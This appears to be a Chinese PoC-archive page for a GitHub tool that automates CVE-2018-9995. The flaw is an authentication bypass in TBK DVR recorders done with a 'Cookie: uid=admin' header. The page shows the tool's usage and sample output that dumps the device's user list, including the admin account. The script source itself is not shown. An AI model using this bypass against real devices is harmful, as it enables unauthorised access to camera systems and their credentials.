POC详情: 29e6b63bdff5b2842c9243e2e602bde312f184d1

来源
https://github.com/X3RX3SSec/DVR_Sploit
关联漏洞
标题: TBK DVR4104和DVR4216 安全漏洞 (CVE-2018-9995)
描述:TBK DVR4104和DVR4216都是高清数字录像机设备。 TBK DVR4104和DVR4216中存在安全漏洞。远程攻击者可借助Cookie: uid=admin包头利用该漏洞绕过身份验证。
描述
Simple python3 script to automate CVE-2018-9995
介绍
# DVR_Sploit
Simple python3 script to automate CVE-2018-9995

![dvrsploit](https://github.com/X3RX3SSec/DVR_Sploit/assets/141476851/7668e9ee-2881-4619-8903-4350a88334c0)

Requirements: requests (pip install requests)

Usage:
root@fuckmachine:~# python3 dvrsploit.py

Enter DVR host: 192.168.69.69

Enter DVR port: 88

Device list:

{"result":0,"list":[{"uid":"admin","pwd":"","role":2,"enmac":0,"mac":"00:00:00:00:00:00","playback":4294967295,"view":4294967295,"rview":4294967295,"ptz":4294967295,"backup":4294967295,"opt":4294967295}]}
Device list appended to dvr_output.txt
文件快照

 [4.0K]  /data/pocs/29e6b63bdff5b2842c9243e2e602bde312f184d1
├── [ 45K]  dvrsploit.jpg
├── [1.4K]  dvrsploit.py
├── [ 34K]  LICENSE
└── [ 576]  README.md

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。